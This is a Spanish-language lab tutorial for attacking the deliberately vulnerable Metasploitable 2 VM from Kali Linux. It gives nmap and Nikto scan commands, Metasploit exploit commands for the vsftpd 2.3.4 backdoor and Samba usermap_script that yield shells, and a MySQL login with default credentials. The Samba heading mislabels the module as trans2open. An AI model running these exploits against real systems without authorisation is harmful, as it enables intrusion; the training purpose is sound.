Tabla de Contenidos
Plan de Evaluación y Explotación de Vulnerabilidades en Metasploitable 2
Plan detallado para comprobar las vulnerabilidades de Metasploitable 2 usando Kali Linux. Este plan está diseñado de manera didáctica para que sea fácil de seguir y entender. Metasploitable 2 es una máquina virtual vulnerable diseñada específicamente para pruebas de seguridad y formación en ciberseguridad.
Paso 1: Configuración del Entorno
- Descargar e instalar VirtualBox o VMware: Si no lo tienes ya, descarga e instala VirtualBox o VMware Workstation Player.
- Descargar Metasploitable 2: Descarga la máquina virtual de Metasploitable 2 desde el sitio oficial de Rapid7.
- Configurar la Máquina Virtual: Importa la máquina virtual de Metasploitable 2 en VirtualBox o VMware y asegúrate de que esté en la misma red que tu máquina Kali Linux (puedes usar una red NAT o una red interna para aislamiento).
- Iniciar las máquinas virtuales: Inicia tanto Metasploitable 2 como Kali Linux.
Paso 2: Reconocimiento
Identificar la dirección IP de Metasploitable 2
- En la terminal de Kali Linux, utiliza el comando
nmappara identificar la dirección IP:
sudo nmap -sn 192.168.0.0/24
- Encuentra la dirección IP de Metasploitable 2 en los resultados.
Escaneo de Puertos y Servicios
- Realiza un escaneo completo de puertos y servicios en la IP de Metasploitable 2:
sudo nmap -A -T4 <IP-de-Metasploitable2>
- Esto identificará los puertos abiertos y los servicios que se ejecutan en ellos.
Paso 3: Identificación de Vulnerabilidades
Buscar servicios vulnerables
- Analiza los resultados del escaneo de Nmap para identificar servicios conocidos por ser vulnerables. Metasploitable 2 incluye servicios como FTP, SSH, Telnet, SMB, y varios otros.
Uso de Nikto para análisis de vulnerabilidades web
- Ejecuta Nikto contra la IP de Metasploitable 2 para identificar vulnerabilidades en servicios web:
sudo nikto -h <IP-de-Metasploitable2>
Paso 4: Explotación de Vulnerabilidades
A continuación, se describen algunas vulnerabilidades comunes en Metasploitable 2 y cómo explotarlas.
Explotación de VSFTPD 2.3.4
- Identificación: VSFTPD 2.3.4 es un servicio FTP que tiene una puerta trasera conocida.
- Uso de Metasploit:
sudo msfconsole
- Dentro de Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor set RHOST <IP-de-Metasploitable2> exploit
- Esto debería darte una shell en Metasploitable 2.
Explotación de Samba (SMB) usando el exploit de trans2open
- Identificación: Samba 3.x tiene una vulnerabilidad conocida.
- Uso de Metasploit:
sudo msfconsole
- Dentro de Metasploit:
use exploit/multi/samba/usermap_script set RHOST <IP-de-Metasploitable2> exploit
- Esto debería proporcionar acceso a una shell con privilegios de root.
Explotación de una vulnerabilidad en la base de datos MySQL
- Identificación: MySQL en Metasploitable 2 tiene credenciales por defecto (root:root).
- Explotación manual:
mysql -u root -p -h <IP-de-Metasploitable2>
- Introduce la contraseña
root. - Una vez dentro de la base de datos, puedes ejecutar comandos SQL maliciosos.
Paso 5: Documentación y Mitigación
- Documentar las vulnerabilidades encontradas: Registra todas las vulnerabilidades identificadas, los métodos de explotación utilizados y los resultados obtenidos.
- Recomendar medidas de mitigación: Sugiere cómo pueden solucionarse estas vulnerabilidades, como actualizar el software, cambiar credenciales por defecto, y deshabilitar servicios innecesarios.
Conclusión
Este plan proporciona una guía completa para la evaluación y explotación de vulnerabilidades en Metasploitable 2 usando Kali Linux. Cada paso incluye instrucciones detalladas y comandos específicos para facilitar el aprendizaje y la comprensión.